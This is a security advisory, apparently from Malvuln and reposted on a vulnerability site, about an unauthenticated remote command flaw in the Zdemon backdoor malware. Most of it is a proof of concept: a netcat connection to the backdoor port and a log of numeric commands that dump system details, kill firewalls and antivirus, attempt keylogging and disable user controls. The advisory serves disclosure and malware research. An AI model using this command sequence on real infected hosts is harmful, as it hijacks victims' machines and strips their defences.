Backdoor.Win32.Zdemon.126 / Unauthenticated Remote Command Execution

2021.08.06
us malvuln (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/cedc886b593f013133df39bb6b43a762.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Zdemon.126 Vulnerability: Unauthenticated Remote Command Execution Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor. Type: PE32 MD5: cedc886b593f013133df39bb6b43a762 Vuln ID: MVID-2021-0314 Disclosure: 08/05/2021 Exploit/PoC: nc64.exe x.x.x.x 31556 001 112 112Victim 01 1.11002 002 [ PC Details ] User name : Victim Computer name : DESKTOP-2C3IQHO Registered owner : Registered organisation : Processor name : Intel64 Family 6 Model 158 Stepping 9 Processor speed : ~2894 MHz Memory : 2047.488 Mb Resolution : 1569x802 Default printer : Free disk space : 3,818 003 003 [ OS Details ] Operating System : Version : Version No. : Platform ID. : Win32 on Windows NT Product key : Windows language : English (United States) TimeZone : @tzres.dll,-111 DirectX version : 4.09.00.0904 Windows folder : C:\WINDOWS System folder : C:\WINDOWS\system32 Temp folder : C:\Users\Victim\AppData\Local\Temp\ ProgramFiles folder : C:\Program Files (x86) NumLock state : Off CapsLock state : Off ScrollLock state : Off Play sounds : Yes Current time : 4/2/2021 12:13:18 AM Minutes in windows : 724 mins 0010077 000Blackhole is running on screen. .078 000Stopped blackhole. 0010110Mailbox not found.116 0010075 000Screen is fliped. 0010080 001 0010081 000Chat Window is closed.080 000User clicked : [ OK ]000User clicked : [ OK ] 0010090 090about:blank091 001 0010091 malvuln.com 000Homepage is set. 0010014 000Monitor is on now. 001 0010005 005 [ Email Details ] POP3 UserName : none POP3 Server : none SMTP UserName : none SMTP Email Address none: SMTP Server : none 001 0010014 000Monitor is on now.015 000CD-ROM was been opened.016 000CD-ROM was been closed.017 000Mouse disabled.018 000Mouse trails disabled.019 000Mouse buttons restored.020 000Crazy mouse is stopped021 000Crazy mouse is stopped022 1569x802, 256 colors023 000Resolution is changed.024 001 0010025 000CTRL+ALT+DEL disabled.001 0010026 000NumLock button disabled.001 0010027 000CapsLock button disabled.001 0010028 000ScrollLock button disabled.001 0010029 02912:44:19|4/2/2021001 0010030 000! Can't change remote time.001 0010031 000! Can't change remote date.001 0010032 000Clipboard is empty or not as text-format.001 0010033 000Clipboard content changed.001 0010034 000Clipboard cleared.001 0010035 000Clipboard enabled.001 0010036 000Screen saver was been started.0037 001 0010038 001 000Firewalls were been killed.0010001 0010039 001 000AntiVirus were been killed.00100 001 0010040 001 0010041 65796001Manager[DESKTOP-2C3IQHO\Victim]+ (Administrator) 0010042 000Window is hidden now.001 0010042 000Window is hidden now.001 00100043 004 [ Network Details ] Workgroup : Computer name : File sharing : Print sharing : Server list : Registered owner : Registered organisation : 001 0010044 000Window is minimized now.001 0010045 000Window is maximized now.001 0010046 000Window was been closed.001 0010047 000Window is active now.001 0010048 000The X button is disabled.001 0010049 000Window title was been changed.001 0010049 000Window title was been changed.001 0010050 000! Error on trying to enable keylogger.001 0010051 051= Unable to get cache passwords on WinNT platform. =001 0010055 001 0010056 000Capturing stopped.001 0010057 001 0010058 000Taskbar is invisible now.001 0010059 000Taskbar is disabled now.001 0010060 000Desktop icons are invisible now.001 0010061 000Desktop icons are disabled now.001 0010062 000Start button is invisible now.001 0010063 000Start button is disabled now.001 0010064 000Start menu was beed opened.001 0010065 000Taskbar icons are invisible now.001 0010066 000Quick launch bar is invisible now.001 0010067 000Wallpaper is removed now.001 0010068 000Task clock is invisible now.001 0010069 000Task rebar is invisible now.001 0010070 000All windows are minimized now.001 0010071 000Flashing lights are run now.00 001 0010072 000Flashing lights are stopped now.001 (114 terminates the backdoor) 001 0010114 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top